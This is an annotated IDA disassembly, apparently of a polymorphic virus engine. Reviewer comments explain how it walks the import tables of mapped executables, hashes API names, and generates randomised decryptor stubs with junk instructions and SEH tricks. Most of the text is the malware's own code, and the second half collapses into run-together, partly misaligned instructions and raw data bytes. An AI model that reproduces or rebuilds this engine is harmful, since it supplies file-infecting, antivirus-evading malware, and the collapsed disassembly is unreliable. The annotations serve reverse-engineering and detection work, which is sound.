        pop esi                         ; restore file base
        cmp dword ptr [edx], 0
        jz short loc_3143A4A5
        push dword ptr [edx]
        jmp short loc_3143A4A8
; ---------------------------------------------------------------------------
loc_3143A4A5: ; CODE XREF: sub_3143A4BA-1Bj
        push dword ptr [edx+10h]
loc_3143A4A8: ; CODE XREF: sub_3143A4BA-17j
        call sub_3143A404               ; refresh [ebp+1042E8h] for the thunk array's section
        sub ecx, esi
        sub ecx, [ebp+1042E8h]
        pop eax                         ; drops one more dword -- presumably sub_3143A50B's return address; confirm
        add ecx, [ebx+34h]
        retn
; END OF FUNCTION CHUNK FOR sub_3143A4BA

; =============== S U B R O U T I N E =======================================
; sub_3143A4BA -- two-pass import selection.
;   Pass 1: registers the caller's continuation as the callback, zeroes the counter at
;           [ebp+1042C0h] and walks the imports (the callback counts, or exits on a table hit).
;   Then calls the helper at dword_31439B40+43h with eax = count.
;           NOTE(review): from its uses in this file the helper takes a bound in eax and
;           returns a value in edx -- presumably a bounded random number; confirm.
;   Pass 2: sub_3143A4F7 registers the code after its call site as the callback and stores
;           edx in the counter; that callback decrements the counter per import and, when it
;           is already 0, records the hash at [ebp+102400h] and takes the exit at loc_3143A48C.
; Does not return normally: its return address is consumed by the first instruction.
sub_3143A4BA proc near ; CODE XREF: UPX2:3143A451p ; FUNCTION CHUNK AT 3143A48C SIZE 0000002E BYTES
        pop dword ptr [ebp+1042C4h]     ; callback := caller's continuation
        mov dword ptr [ebp+1042C0h], 0
        call sub_3143A50B
        mov eax, [ebp+1042C0h]
        call near ptr dword_31439B40+43h
        call sub_3143A4F7
        cmp dword ptr [ebp+1042C0h], 0  ; pass-2 callback body starts here
        jnz short loc_3143A4F0
        mov [ebp+102400h], ebx
        jmp short loc_3143A48C
; ---------------------------------------------------------------------------
loc_3143A4F0: ; CODE XREF: sub_3143A4BA+2Cj
        dec dword ptr [ebp+1042C0h]
        retn
sub_3143A4BA endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3143A4F7 -- register the caller's continuation as the callback, set the counter
; at [ebp+1042C0h] to edx and walk the imports. If the walk completes without the
; callback exiting, returns ecx = 0 to whatever address is then on top of the stack.
sub_3143A4F7 proc near ; CODE XREF: sub_3143A4BA+20p
        pop dword ptr [ebp+1042C4h]
        mov [ebp+1042C0h], edx
        call sub_3143A50B
        xor ecx, ecx
        retn
sub_3143A4F7 endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3143A50B -- walk an import table and invoke a callback per by-name import.
; In:    ebx = header base (see sub_3143A404); [ebx+80h] is read as the RVA of the table,
;              which in IMAGE_NT_HEADERS is the import directory entry
;        esi = base added to file offsets (presumably the mapped file; confirm)
;        [ebp+1042C4h] = callback, called with ebx = name hash, edx = current 14h-byte
;              record, esi = thunk cursor, stack = [ret][saved ebx][saved esi]
; Flow:  records are 14h bytes; the walk stops when [+0Ch] or [+10h] is 0.
;        A record is processed only if its name has at least six characters before
;        ".DLL" (compared case-insensitively) or before the terminating NUL, and those
;        characters end in "32" -- KERNEL32.DLL would qualify, for example.
;        Thunks are read from [+0] when non-zero, else from [+10h]; entries with the top
;        bit set (ordinal imports) are skipped.
;        Each name is hashed as  h = h*15 - (c | 20h)  over its bytes, starting from 0.
;        Eight hash values are excluded; every other name is passed to the callback.
;        The API names behind those eight constants cannot be recovered from this listing.
; Clobb: eax, ecx, edx; [ebp+1042E4h]/[ebp+1042E8h] via sub_3143A404
sub_3143A50B proc near ; CODE XREF: sub_3143A4BA+10p ; sub_3143A4F7+Cp ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
        mov edx, [ebx+80h]
        push edx
        call sub_3143A404
        add edx, [ebp+1042E8h]
        add edx, esi                    ; edx -> first import record in the mapping
loc_3143A51F: ; CODE XREF: sub_3143A50B+120j
        cmp dword ptr [edx+0Ch], 0
        jz locret_3143A630
        cmp dword ptr [edx+10h], 0
        jz locret_3143A630
        mov eax, [edx+0Ch]
        push eax
        call sub_3143A404
        add eax, [ebp+1042E8h]
        add eax, esi                    ; eax -> DLL name string
        push eax                        ; remember start of name
loc_3143A545: ; CODE XREF: sub_3143A50B+47j
        mov cl, [eax]
        cmp cl, 0
        jz short loc_3143A565
        cmp cl, 2Eh                     ; '.'
        jz short loc_3143A554
loc_3143A551: ; CODE XREF: sub_3143A50B+58j
        inc eax
        jmp short loc_3143A545
; ---------------------------------------------------------------------------
loc_3143A554: ; CODE XREF: sub_3143A50B+44j
        mov ecx, [eax+1]
        and ecx, 0DFDFDFDFh             ; fold ASCII letters to upper case
        cmp ecx, 4C4C44h                ; "DLL",0
        jnz short loc_3143A551
loc_3143A565: ; CODE XREF: sub_3143A50B+3Fj
        pop ecx
        sub ecx, eax                    ; ecx = -(characters before '.' or NUL)
        cmp ecx, 0FFFFFFFAh
        jg loc_3143A628                 ; fewer than 6 characters: skip record
        cmp word ptr [eax-2], 3233h     ; last two characters must be "32"
        jnz loc_3143A628
        push esi                        ; save file base while esi is the thunk cursor
        cmp dword ptr [edx], 0
        jnz short loc_3143A588
        mov ecx, [edx+10h]
        jmp short loc_3143A58A
; ---------------------------------------------------------------------------
loc_3143A588: ; CODE XREF: sub_3143A50B+76j
        mov ecx, [edx]
loc_3143A58A: ; CODE XREF: sub_3143A50B+7Bj
        add esi, ecx
        push ecx
        call sub_3143A404
        add esi, [ebp+1042E8h]          ; esi -> thunk array in the mapping
loc_3143A598: ; CODE XREF: sub_3143A50B+90j ; sub_3143A50B+117j
        lodsd
        test eax, eax
        js short loc_3143A598           ; ordinal import: skip
        jz loc_3143A627                 ; end of thunk array
        push dword ptr [ebp+1042E8h]    ; keep the thunk section's delta across the lookup
        push eax
        call sub_3143A404
        add eax, [ebp+1042E8h]
        pop dword ptr [ebp+1042E8h]
        add eax, [esp+4+var_4]          ; + saved file base
        push ebx                        ; save header pointer; ebx becomes the hash
        add eax, 2                      ; skip the 2-byte field in front of the name
        xor ebx, ebx
loc_3143A5C4: ; CODE XREF: sub_3143A50B+CEj
        movzx ecx, byte ptr [eax]
        jecxz short loc_3143A5DB
        or cl, 20h
        push ebx                        ; computed on the stack: h = (h << 4) - h - c
        shl [esp+0Ch+var_C], 4
        sub [esp+0Ch+var_C], ebx
        sub [esp+0Ch+var_C], ecx
        pop ebx
        inc eax
        jmp short loc_3143A5C4
; ---------------------------------------------------------------------------
loc_3143A5DB: ; CODE XREF: sub_3143A50B+BCj
        cmp ebx, 0DDBBD70Fh             ; excluded hashes: no callback for these
        jz short loc_3143A621
        cmp ebx, 0DB6E45A8h
        jz short loc_3143A621
        cmp ebx, 0FFA13B59h
        jz short loc_3143A621
        cmp ebx, 0ACB522D6h
        jz short loc_3143A621
        cmp ebx, 0F358E993h
        jz short loc_3143A621
        cmp ebx, 0F358E97Dh
        jz short loc_3143A621
        cmp ebx, 0E1253F46h
        jz short loc_3143A621
        cmp ebx, 0E1253F30h
        jz short loc_3143A621
        call dword ptr [ebp+1042C4h]    ; callback may not return (see loc_3143A48C)
loc_3143A621: ; CODE XREF: sub_3143A50B+D6j ; sub_3143A50B+DEj ...
        pop ebx
        jmp loc_3143A598
; ---------------------------------------------------------------------------
loc_3143A627: ; CODE XREF: sub_3143A50B+92j
        pop esi
loc_3143A628: ; CODE XREF: sub_3143A50B+60j ; sub_3143A50B+6Cj
        add edx, 14h
        jmp loc_3143A51F
; ---------------------------------------------------------------------------
locret_3143A630: ; CODE XREF: sub_3143A50B+18j ; sub_3143A50B+22j
        retn
sub_3143A50B endp
; ---------------------------------------------------------------------------
; Bytes IDA left as data. The calls to dword_3143A634+68h below land inside this run
; (assumes the dd run starts at 3143A634, right after the 3 bytes that follow
; locret_3143A630 -- the label itself is not shown), so it contains code.
        db 1, 6Ah, 4
        dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h
        dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
        dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h
        dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
        dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
        dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h
        dd 0
; ---------------------------------------------------------------------------
; NOTE(review): disassembly resumes mid-instruction. The last bytes of the dd run plus
; the five instructions below re-decode as
;     test dword ptr [ebp+1039B0h], 10000000h / setnz al / shl eax, 0Bh /
;     test byte ptr [ebp+1039AEh], 1
; so the text up to the jnz is misaligned; re-disassemble from the F7h byte to confirm.
; The fragment then writes a 16-bit value built from 2589h / 2531h / 2501h to [edi],
; followed by the dword [ebx+34h]; under the re-decode above the first two bytes are
; 89h/31h/01h and 25h or 2Dh.
        adc [edi], cl
        xchg eax, ebp
        rol cl, 0E0h
        or esi, esi
        test [esi+1001039h], ebp
        jnz short loc_3143A6C6
        or ax, 2589h
        jmp short loc_3143A6D9
; ---------------------------------------------------------------------------
loc_3143A6C6: ; CODE XREF: UPX2:3143A6BEj
        test byte ptr [ebp+1039AEh], 2
        jnz short loc_3143A6D5
        or ax, 2531h
        jmp short loc_3143A6D9
; ---------------------------------------------------------------------------
loc_3143A6D5: ; CODE XREF: UPX2:3143A6CDj
        or ax, 2501h
loc_3143A6D9: ; CODE XREF: UPX2:3143A6C4j ; UPX2:3143A6D3j
        stosw
        call near ptr dword_3143A634+68h
        mov eax, [ebx+34h]
        mov [ebp+1042D8h], edx
        stosd
        retn

; =============== S U B R O U T I N E =======================================
; sub_3143A6EB -- write a 5-byte sequence to the output buffer at edi.
;   Byte 0 is BCh, or BDh when bit 28 of the option dword at [ebp+1039B0h] is set
;   (the opcodes of `mov esp, imm32` / `mov ebp, imm32`). The following dword is the
;   low half of the time-stamp counter, or 0 when bit 0 of [ebp+1039AEh] is set.
;   edx returned by the helper call is saved at [ebp+1042DCh].
; In:    edi = output cursor (advanced by 5)
sub_3143A6EB proc near ; CODE XREF: UPX2:3143AD37p
        test dword ptr [ebp+1039B0h], 10000000h
        setnz al
        add al, 0BCh
        stosb
        call near ptr dword_3143A634+68h
        mov [ebp+1042DCh], edx
        test byte ptr [ebp+1039AEh], 1
        jnz short loc_3143A713
        rdtsc
        jmp short loc_3143A715
; ---------------------------------------------------------------------------
; (tail of sub_3143A6EB: the dword written after the opcode byte is eax, zeroed on this path)
loc_3143A713: ; CODE XREF: sub_3143A6EB+22j
        sub eax, eax
loc_3143A715: ; CODE XREF: sub_3143A6EB+26j
        stosd
        retn
sub_3143A6EB endp

; =============== S U B R O U T I N E =======================================
; sub_3143A717 -- write one of two fixed instruction sequences to the buffer at edi.
;   r = byte at [ebp+1039AAh], used as a 3-bit register number (assumes r <= 7).
;   Option bit 28 of [ebp+1039B0h] set:
;       8B, 45|(r<<3), F8            -> decodes as  mov r32, [ebp-8]
;       67 64 89, 06|(r<<3), 00 00   -> decodes as  mov fs:[0000h], r32
;   Option bit 28 clear:
;       64 8F 05 00 00 00 00         -> decodes as  pop dword ptr fs:[0]
;       58+r                         -> decodes as  pop r32
;   Both variants end by writing fs:[0], the head of the thread's SEH chain on 32-bit
;   Windows -- generated code that touches fs:[0] is a useful point to watch when tracing.
; In:    edi = output cursor (advanced by 9 or 8)
; Clobb: eax
sub_3143A717 proc near ; CODE XREF: UPX2:loc_3143AD41p
        test dword ptr [ebp+1039B0h], 10000000h
        jz short loc_3143A74A
        mov al, [ebp+1039AAh]
        shl eax, 0Bh                    ; r lands in bits 11..13 = ModRM.reg of the high byte
        or ax, 458Bh
        stosw
        mov al, 0F8h
        stosb
        mov al, [ebp+1039AAh]
        shl eax, 1Bh                    ; r lands in bits 27..29 = ModRM.reg of the top byte
        add eax, 6896467h
        stosd
        xor eax, eax
        stosw
        jmp short locret_3143A75C
; ---------------------------------------------------------------------------
loc_3143A74A: ; CODE XREF: sub_3143A717+Aj
        mov eax, 58F64h
        stosd
        mov al, [ebp+1039AAh]
        add al, 58h
        shl eax, 18h                    ; three zero bytes, then 58h+r
        stosd
locret_3143A75C: ; CODE XREF: sub_3143A717+31j
        retn
sub_3143A717 endp

; =============== S U B R O U T I N E =======================================
; sub_3143A75D -- append a variable-length run of filler instructions at edi.
;   Each round asks the helper at dword_31439B40+43h for a value (bound passed in eax,
;   result read from dl -- presumably a bounded random number; confirm) and stops as soon
;   as the value is 8 or more. Values 0..7 select the bytes written:
;       0: FC        (cld)              4: 87 DB     (xchg ebx, ebx)
;       1: EB 00     (jmp short $+2)    5: F5        (cmc)
;       2: 89, C0+9k (mov r, r; k from  6: F8        (clc)
;          a second helper call, eax=4) 7: F9        (stc)
;       3: 90        (nop)
;   NOTE(review): [ebp+10278Ch] is set to 9 on entry and raised by 6 per round; it may
;   address the immediate of the `push 1Bh` below (a self-modified bound that makes
;   termination more likely each round) -- confirm the ebp base before relying on this.
;   For detection work: the output differs per run, so byte signatures on the filler
;   itself are not stable; the fixed sequences written between fillers are better anchors.
; In:    edi = output cursor
; Clobb: eax, edx, plus whatever the helper clobbers
sub_3143A75D proc near ; CODE XREF: sub_3143A7CF:loc_3143A7F6p ; sub_3143A7CF+4Cp ...
        mov byte ptr [ebp+10278Ch], 9
        jmp short loc_3143A78B
; ---------------------------------------------------------------------------
loc_3143A766: ; CODE XREF: sub_3143A75D+44j
        mov al, 0FCh
        jmp short loc_3143A78A
; ---------------------------------------------------------------------------
loc_3143A76A: ; CODE XREF: sub_3143A75D+48j
        mov ax, 0EBh                    ; stored little-endian: EB 00
        stosw
        jmp short loc_3143A78B
; ---------------------------------------------------------------------------
loc_3143A772: ; CODE XREF: sub_3143A75D+4Cj
        push 4
        pop eax
        call near ptr dword_31439B40+43h
        lea eax, [edx+edx*8]            ; 9*k sets ModRM.reg and ModRM.rm to the same k
        shl eax, 8
        add ax, 0C089h
        stosw
        jmp short loc_3143A78B
; ---------------------------------------------------------------------------
loc_3143A788: ; CODE XREF: sub_3143A75D+50j
        mov al, 90h
loc_3143A78A: ; CODE XREF: sub_3143A75D+Bj ; sub_3143A75D+60j ...
        stosb
loc_3143A78B: ; CODE XREF: sub_3143A75D+7j ; sub_3143A75D+13j ...
        push 1Bh
        pop eax
        call near ptr dword_31439B40+43h
        add byte ptr [ebp+10278Ch], 6
        cmp dl, 8
        jnb short locret_3143A7CE       ; value >= 8 ends the run
        test dl, dl
        jz short loc_3143A766
        dec dl
        jz short loc_3143A76A
        dec dl
        jz short loc_3143A772
        dec dl
        jz short loc_3143A788
        dec dl
        jz short loc_3143A7BF
        dec dl
        jz short loc_3143A7C6
        dec dl
        jz short loc_3143A7CA
        mov al, 0F9h
        jmp short loc_3143A78A
; ---------------------------------------------------------------------------
loc_3143A7BF: ; CODE XREF: sub_3143A75D+54j
        mov al, 87h
        stosb
        mov al, 0DBh
        jmp short loc_3143A78A
; ---------------------------------------------------------------------------
loc_3143A7C6: ; CODE XREF: sub_3143A75D+58j
        mov al, 0F5h
        jmp short loc_3143A78A
; ---------------------------------------------------------------------------
loc_3143A7CA: ; CODE XREF: sub_3143A75D+5Cj
        mov al, 0F8h
        jmp short loc_3143A78A
; ---------------------------------------------------------------------------
locret_3143A7CE: ; CODE XREF: sub_3143A75D+40j
        retn
sub_3143A75D endp

; =============== S U B R O U T I N E =======================================
; sub_3143A7CF -- write a three-part instruction sequence at edi, with filler
; (sub_3143A75D) between the parts. Variants are chosen by bits of [ebp+1039B0h].
;   b = byte at [ebp+1039A8h], written directly as a ModRM byte (so mod=00, reg=0, r/m=b);
;   k = byte at [ebp+1039AAh], used as a register number.
;   Part 1: 86 b (bit 2000h set) or 8A b    -> xchg [b], al   /  mov al, [b]
;   Part 2: 66 31 (bit 4000h set) or 66 29, then C0|(k<<3)
;                                           -> xor ax, k16    /  sub ax, k16
;   Part 3: 88 b (bit 8000h set) or 86 b    -> mov [b], al    /  xchg [b], al
;   When b == 5 the ModRM byte is patched to 45h and a zero displacement byte is added,
;   since r/m=5 with mod=00 would otherwise select a 32-bit absolute address.
;   Read together this is a load / combine-with-register / store step on one memory
;   location; what drives the pointer and the loop is outside this routine.
; In:    edi = output cursor
; Out:   ecx = edi on entry minus 2 (use by the callers is not visible here)
; Clobb: eax, edx (through sub_3143A75D)
sub_3143A7CF proc near ; CODE XREF: UPX2:loc_3143AC18p ; UPX2:3143ADCBp
        test dword ptr [ebp+1039B0h], 2000h
        mov al, 86h
        jnz short loc_3143A7DF
        add al, 4                       ; 8Ah
loc_3143A7DF: ; CODE XREF: sub_3143A7CF+Cj
        lea ecx, [edi-2]
        mov ah, [ebp+1039A8h]
        stosw
        cmp ah, 5
        jnz short loc_3143A7F6
        mov al, 0
        or byte ptr [edi-1], 40h        ; switch ModRM to mod=01 (8-bit displacement)
        stosb                           ; displacement 0
loc_3143A7F6: ; CODE XREF: sub_3143A7CF+1Ej
        call sub_3143A75D
        test dword ptr [ebp+1039B0h], 4000h
        mov ax, 3166h
        jnz short loc_3143A80D
        mov ah, 29h
loc_3143A80D: ; CODE XREF: sub_3143A7CF+3Aj
        stosw
        mov al, 18h
        or al, [ebp+1039AAh]
        shl al, 3                       ; C0h | (k << 3)
        stosb
        call sub_3143A75D
        mov al, 88h
        test dword ptr [ebp+1039B0h], 8000h
        jnz short loc_3143A830
        mov al, 86h
loc_3143A830: ; CODE XREF: sub_3143A7CF+5Dj
        mov ah, [ebp+1039A8h]
        stosw
        cmp ah, 5
        jnz short locret_3143A844
        mov al, 0
        or byte ptr [edi-1], 40h
        stosb
locret_3143A844: ; CODE XREF: sub_3143A7CF+6Cj
        retn
sub_3143A7CF endp ;
--------------------------------------------------------------------------- loc_3143A845: ; CODE XREF: sub_3143B44B+183p lea edi, [ebp+1039BCh] call sub_3143A75D test dword ptr [ebp+1039B0h], 400000h jz short near ptr unk_3143A85F mov al, 60h stosb ; --------------------------------------------------------------------------- unk_3143A85F db 0F7h ; ; CODE XREF: UPX2:3143A85Aj db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- adc [edi+eax-48h], dh push ebp mov ebp, esp add [ebx-4F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- db 2 dup(0), 2 dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 
10001039h dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0 dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h dd 0F7AB0010h, 1039B085h, 0 ; --------------------------------------------------------------------------- inc eax jnz short loc_3143AAF0 mov al, 50h add al, [ebp+1039A8h] stosb loc_3143AAF0: ; CODE XREF: UPX2:3143AAE5j test dword ptr [ebp+1039B0h], 80h jnz short loc_3143AB07 mov al, 0B8h or al, [ebp+1039A9h] stosb jmp short loc_3143AB44 ; --------------------------------------------------------------------------- loc_3143AB07: ; CODE XREF: UPX2:3143AAFAj mov ax, 1831h test dword ptr [ebp+1039B0h], 100h jz short loc_3143AB19 mov al, 29h loc_3143AB19: ; CODE XREF: UPX2:3143AB15j or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw mov ax, 0F081h test dword ptr [ebp+1039B0h], 200h jnz short loc_3143AB3C mov ah, 0C8h loc_3143AB3C: ; CODE XREF: UPX2:3143AB38j or ah, [ebp+1039A9h] stosw loc_3143AB44: ; CODE XREF: UPX2:3143AB05j mov [ebp+1042D4h], edi mov eax, 29BCh stosd test dword ptr [ebp+1039B0h], 8 jz short loc_3143ABCD call sub_3143A75D test dword ptr [ebp+1039B0h], 400h jnz short loc_3143AB78 mov al, 0B8h or al, [ebp+1039AAh] stosb jmp short loc_3143ABC5 ; --------------------------------------------------------------------------- loc_3143AB78: ; CODE XREF: UPX2:3143AB6Bj test dword ptr [ebp+1039B0h], 800h jnz short loc_3143AB95 mov ax, 0E083h or ah, [ebp+1039AAh] stosw xor eax, eax stosb jmp short loc_3143ABAA ; --------------------------------------------------------------------------- loc_3143AB95: ; CODE XREF: UPX2:3143AB82j mov ax, 1829h or ah, [ebp+1039AAh] shl ah, 3 or ah, [ebp+1039AAh] stosw loc_3143ABAA: ; CODE XREF: UPX2:3143AB93j test dword 
ptr [ebp+1039B0h], 1000h mov ax, 0C081h jz short loc_3143ABBD add ah, 8 loc_3143ABBD: ; CODE XREF: UPX2:3143ABB8j or ah, [ebp+1039AAh] stosw loc_3143ABC5: ; CODE XREF: UPX2:3143AB76j movzx eax, byte ptr [ebp+1039AEh] stosd loc_3143ABCD: ; CODE XREF: UPX2:3143AB5Aj call sub_3143A75D test dword ptr [ebp+1039B0h], 40000000h jz short loc_3143ABEC mov al, 50h add al, [ebp+1039A8h] stosb call sub_3143A75D loc_3143ABEC: ; CODE XREF: UPX2:3143ABDCj lea ecx, [edi-2] mov [ebp+1042BCh], ecx test dword ptr [ebp+1039B0h], 80000000h jz short loc_3143AC18 mov al, 0E8h stosb mov eax, [ebp+1042E0h] sub eax, edi sub eax, 4 stosd mov [ebp+1042E0h], edi jmp short loc_3143AC1D ; --------------------------------------------------------------------------- loc_3143AC18: ; CODE XREF: UPX2:3143ABFFj call sub_3143A7CF loc_3143AC1D: ; CODE XREF: UPX2:3143AC16j call sub_3143A75D test dword ptr [ebp+1039B0h], 10000h jnz short loc_3143AC39 mov al, 40h or al, [ebp+1039A8h] stosb jmp short loc_3143AC48 ; --------------------------------------------------------------------------- loc_3143AC39: ; CODE XREF: UPX2:3143AC2Cj mov ax, 0C083h or ah, [ebp+1039A8h] stosw mov al, 1 stosb loc_3143AC48: ; CODE XREF: UPX2:3143AC37j test dword ptr [ebp+1039B0h], 20000h jnz short loc_3143AC83 test dword ptr [ebp+1039B0h], 40000h jnz short loc_3143AC7A mov al, 0C0h or al, [ebp+1039AAh] mov ah, [ebp+1039AFh] shl eax, 10h mov ax, 8166h stosd mov al, 0 jmp short loc_3143AC82 ; --------------------------------------------------------------------------- loc_3143AC7A: ; CODE XREF: UPX2:3143AC5Ej mov al, 40h or al, [ebp+1039AAh] loc_3143AC82: ; CODE XREF: UPX2:3143AC78j stosb loc_3143AC83: ; CODE XREF: UPX2:3143AC52j test dword ptr [ebp+1039B0h], 80000h jnz short loc_3143AC9F mov ax, 0E883h or ah, [ebp+1039A9h] stosw mov al, 1 jmp short loc_3143ACA7 ; --------------------------------------------------------------------------- loc_3143AC9F: ; CODE XREF: UPX2:3143AC8Dj mov al, 48h or al, [ebp+1039A9h] loc_3143ACA7: ; CODE 
XREF: UPX2:3143AC9Dj stosb call sub_3143A75D test dword ptr [ebp+1039B0h], 100000h mov cl, 75h jnz short loc_3143ACE0 mov ax, 0F883h or ah, [ebp+1039A9h] stosw xor eax, eax stosb sub [ebp+1042BCh], edi test dword ptr [ebp+1039B0h], 200000h jnz short loc_3143ACFB mov cl, 77h jmp short loc_3143ACFB ; --------------------------------------------------------------------------- loc_3143ACE0: ; CODE XREF: UPX2:3143ACB9j mov ax, 1809h or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw sub [ebp+1042BCh], edi loc_3143ACFB: ; CODE XREF: UPX2:3143ACDAj ; UPX2:3143ACDEj mov al, cl mov ah, [ebp+1042BCh] stosw mov al, 58h add al, [ebp+1039A8h] stosb call sub_3143A75D test dword ptr [ebp+1039B0h], 2000003h jz short loc_3143AD4B test dword ptr [ebp+1039B0h], 8000000h jnz short loc_3143AD4B test dword ptr [ebp+1039B0h], 6000000h jnz short loc_3143AD41 call sub_3143A6EB call sub_3143A75D loc_3143AD41: ; CODE XREF: UPX2:3143AD35j call sub_3143A717 call sub_3143A75D loc_3143AD4B: ; CODE XREF: UPX2:3143AD1Dj ; UPX2:3143AD29j test dword ptr [ebp+1039B0h], 10000000h jz short loc_3143AD5F mov al, 0C9h stosb call sub_3143A75D loc_3143AD5F: ; CODE XREF: UPX2:3143AD55j test dword ptr [ebp+1039B0h], 400000h jz short loc_3143AD95 mov al, 7 sub al, [ebp+1039A8h] shl eax, 1Ah or eax, 240889h add ah, [ebp+1039A8h] shl ah, 3 add ah, 4 stosd call sub_3143A75D mov al, 61h stosb call sub_3143A75D loc_3143AD95: ; CODE XREF: UPX2:3143AD69j mov ax, 0E0FFh or ah, [ebp+1039A8h] stosw call sub_3143A75D test dword ptr [ebp+1039B0h], 20h jz short loc_3143AE21 test dword ptr [ebp+1039B0h], 80000000h jz short loc_3143ADDD mov eax, edi mov ecx, [ebp+1042E0h] sub eax, ecx mov [ecx-4], eax call sub_3143A7CF call sub_3143A75D mov al, 0C3h stosb call sub_3143A75D loc_3143ADDD: ; CODE XREF: UPX2:3143ADBCj mov eax, edi mov ecx, [ebp+1042B4h] sub eax, ecx mov [ecx-4], eax mov al, 58h or al, [ebp+1039A8h] stosb call sub_3143A75D test dword ptr [ebp+1039B0h], 800000h jz short loc_3143AE10 mov ax, 0C350h or al, 
[ebp+1039A8h] jmp short loc_3143AE1A ; --------------------------------------------------------------------------- loc_3143AE10: ; CODE XREF: UPX2:3143AE02j mov ax, 0E0FFh or ah, [ebp+1039A8h] loc_3143AE1A: ; CODE XREF: UPX2:3143AE0Ej stosw call sub_3143A75D loc_3143AE21: ; CODE XREF: UPX2:3143ADB0j test dword ptr [ebp+1039B0h], 2000003h jz short loc_3143AE8C mov ecx, edi mov eax, [ebp+1042CCh] sub ecx, eax mov [eax-4], ecx xor ecx, ecx test dword ptr [ebp+1039B0h], 1000000h jnz short loc_3143AE56 lea eax, [ebp+1039A8h] loc_3143AE4E: ; CODE XREF: UPX2:3143AE54j mov cl, [eax] inc eax cmp cl, 3 jnb short loc_3143AE4E loc_3143AE56: ; CODE XREF: UPX2:3143AE46j lea eax, ds:102444h[ecx*8] shl eax, 8 mov al, 8Bh stosd jecxz short loc_3143AE6B mov ax, 0C031h stosw loc_3143AE6B: ; CODE XREF: UPX2:3143AE63j mov ax, 808Fh push 0B8h add ah, cl stosw pop eax stosd test ecx, ecx jnz short loc_3143AE84 mov ax, 0C031h stosw loc_3143AE84: ; CODE XREF: UPX2:3143AE7Cj mov al, 0C3h stosb call sub_3143A75D loc_3143AE8C: ; CODE XREF: UPX2:3143AE2Bj lea eax, [ebp+1039BCh] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_3143AEA4 push edi sub edi, eax pop eax jmp short loc_3143AEBD ; --------------------------------------------------------------------------- loc_3143AEA4: ; CODE XREF: UPX2:3143AE9Cj mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042D4h] add [ebp+1042B4h], edx add [ecx], edi mov eax, [esp+4] loc_3143AEBD: ; CODE XREF: UPX2:3143AEA2j mov [ebp+101069h], edi mov edi, [ebp+1042B8h] sub eax, [ebp+1042B4h] test dword ptr [ebp+1039B0h], 40h jz short loc_3143AEDD neg eax loc_3143AEDD: ; CODE XREF: UPX2:3143AED9j stosd retn 4 ; =============== S U B R O U T I N E ======================================= sub_3143AEE1 proc near ; CODE XREF: sub_3143B44B+336p push esi push edi cmp dword ptr [ebp+1042F0h], 0 jz loc_3143B0C9 call near ptr loc_3143AF01+1 dec ebx inc ebp push edx dec esi inc ebp dec esp xor esi, [edx] db 2Eh inc esp dec esp dec esp loc_3143AF01: ; CODE 
